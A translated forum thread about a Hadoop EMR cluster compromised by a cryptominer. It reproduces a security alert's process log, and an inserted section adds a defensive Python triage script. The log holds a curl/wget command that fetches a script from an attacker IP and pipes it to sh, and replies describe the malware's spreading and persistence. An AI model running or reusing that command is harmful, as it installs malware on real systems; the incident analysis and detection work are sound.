A coworker slipped up and exposed EMR to the public internet, and the cluster ended up infected with a cryptominer. Posting it here for everyone to have a look.

2021-05-17 16:28:41 +08:00
 galenzhao

Malicious script - Malicious script code execution (pending)
Notes
This alert was detected by the following engine:
Command line: wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh
Process PID: 20234
Process file name: wget
Parent process ID: 19624
Parent process file path: /usr/bin/bash
Process chain:
-[3020]  /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager -Xmx1536m -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir= -Dyarn.id.str=hadoop -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Dnodemanager.audit.logger.appender=NMAUDIT -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -Dyarn.policy.file=hadoop-policy.xml -server -javaagent:/var/lib/ecm-agent/data/jmxetric-1.0.8.jar=host=localhost,port=8649,mode=unicast,wireformat31x=true,process=YARN_NodeManager,cxss=/var/lib/ecm-agent/data/jmxetric.xml -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=128M -Xloggc:/var/log/hadoop-yarn/nodemanager-gc.log -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -classpath 
/etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/*:/usr/lib/hadoop-current/lib/*:/usr/lib/tez-current/*:/usr/lib/tez-current/lib/*:/etc/ecm/tez-conf:/opt/apps/extra-jars/*:/usr/lib/spark-current/yarn/spark-2.4.5-yarn-shuffle.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/etc/ecm/hadoop-conf/nm-config/log4j.properties org.apache.hadoop.yarn.server.nodemanager.NodeManager
    -[19619]  bash /mnt/disk2/yarn/usercache/dr.who/appcache/application_1612510029551_7345/container_1612510029551_7345_02_000001/default_container_executor.sh
        -[19622]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
            -[19624]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh

Event description: Cloud Security Center detected that your host is executing malicious script code (including but not limited to bash, powershell, python); please investigate the source of the intrusion immediately. If this is your own operations activity, choose Ignore.

http://194.145.227.21/ldr.sh

2506 views
Node: 分享发现 (Share & Discover)
3 replies
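The process chain in the alert tells the whole story: the YARN NodeManager launched a container for the user `dr.who` (the default identity Hadoop assigns to unauthenticated HTTP/REST callers when no authentication is configured), and the container's launch script did nothing but fetch a remote script and pipe it into `sh`. The following is an added example, not part of the original post or of the Cloud Security Center product, showing how a defender could parse this alert format and triage it with a few rules: the chain sample is a constructed copy of the chain above with the long Java command line abridged, and the rule names and the `triage`/`analyze` functions are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List, Optional, Tuple

# Constructed sample in the alert's "-[pid]  command" indented format
# (copied from the alert above, Java arguments abridged to "...").
SAMPLE_CHAIN = """\
-[3020]  /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager ... org.apache.hadoop.yarn.server.nodemanager.NodeManager
    -[19619]  bash /mnt/disk2/yarn/usercache/dr.who/appcache/application_1612510029551_7345/container_1612510029551_7345_02_000001/default_container_executor.sh
        -[19622]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
            -[19624]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
"""


@dataclass
class Proc:
    pid: int
    depth: int          # indentation width, used to rebuild parent links
    cmd: str
    parent: Optional["Proc"] = None


LINE_RE = re.compile(r"^(\s*)-\[(\d+)\]\s+(.*)$")
# Hadoop's default anonymous user when web/REST auth is off.
DR_WHO_RE = re.compile(r"/usercache/dr\.who/")
# curl/wget fetching an http(s) URL whose output is piped into a shell.
DOWNLOAD_PIPE_RE = re.compile(r"\b(curl|wget)\b.*https?://.*\|\s*(ba)?sh\b")
NODEMANAGER_MARK = "server.nodemanager.NodeManager"


def parse_chain(text: str) -> List[Proc]:
    """Turn the indented process chain into Proc objects with parent links."""
    procs: List[Proc] = []
    stack: List[Proc] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proc = Proc(pid=int(m.group(2)), depth=len(m.group(1)), cmd=m.group(3))
        # The nearest less-indented entry above is the parent.
        while stack and stack[-1].depth >= proc.depth:
            stack.pop()
        proc.parent = stack[-1] if stack else None
        stack.append(proc)
        procs.append(proc)
    return procs


def ancestors(proc: Proc) -> Iterator[Proc]:
    cur = proc.parent
    while cur is not None:
        yield cur
        cur = cur.parent


def analyze(procs: List[Proc]) -> List[Tuple[int, List[str]]]:
    """Apply the triage rules; returns (pid, reasons) for every flagged process."""
    findings = []
    for p in procs:
        reasons = []
        if DR_WHO_RE.search(p.cmd):
            reasons.append("container_launched_as_dr.who")
        if DOWNLOAD_PIPE_RE.search(p.cmd):
            reasons.append("download_piped_to_shell")
        if "hadoopUnauth" in p.cmd:          # the user-agent seen in this alert
            reasons.append("user_agent_hadoopUnauth")
        # Context rule: only meaningful if the process descends from the NodeManager.
        if reasons and any(NODEMANAGER_MARK in a.cmd for a in ancestors(p)):
            reasons.append("under_yarn_nodemanager")
        if reasons:
            findings.append((p.pid, reasons))
    return findings


def verdict(findings: List[Tuple[int, List[str]]]) -> str:
    seen = {r for _, reasons in findings for r in reasons}
    if {"download_piped_to_shell", "under_yarn_nodemanager"} <= seen:
        return "malicious: remote script executed inside a YARN container"
    if "container_launched_as_dr.who" in seen:
        return "suspicious: YARN application submitted by anonymous user dr.who"
    return "no finding"


def triage(chain_text: str) -> dict:
    procs = parse_chain(chain_text)
    findings = analyze(procs)
    return {"verdict": verdict(findings), "findings": findings}


if __name__ == "__main__":
    result = triage(SAMPLE_CHAIN)
    print(result["verdict"])
    for pid, reasons in result["findings"]:
        print(pid, ", ".join(reasons))
```

The two context rules are the ones worth keeping in a real detector: any YARN container whose launch script runs `curl`/`wget` piped into a shell, and any application owned by `dr.who`, which only ever appears when the ResourceManager accepts unauthenticated submissions. The user-agent string is specific to this campaign and will not survive the next one, so it is listed last.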
march1993
2021-05-17 16:57:44 +08:00
1) There's also a BrowserUpdate.exe... it replaces every .html .php .jsp file... impressive... why not just inject JS into the HTML, that would be more practical...
2) It also wrote 8.8.8.8 into the DNS config; has this guy been burned badly by DNS before?
3) No crontab? It installs one for you?? And one that supports both apt and yum???
4) It follows bash_history to infect every host you've logged into? 666
5) The server itself wasn't actually mining, though...
galenzhao
2021-05-17 23:48:16 +08:00
@march1993 The mining was a separate py script; it deleted itself 🙄
missz
2021-05-18 10:16:06 +08:00
It was probably deleted by security software like Cloud Shield (云盾).

https://www.v2ex.com/t/777463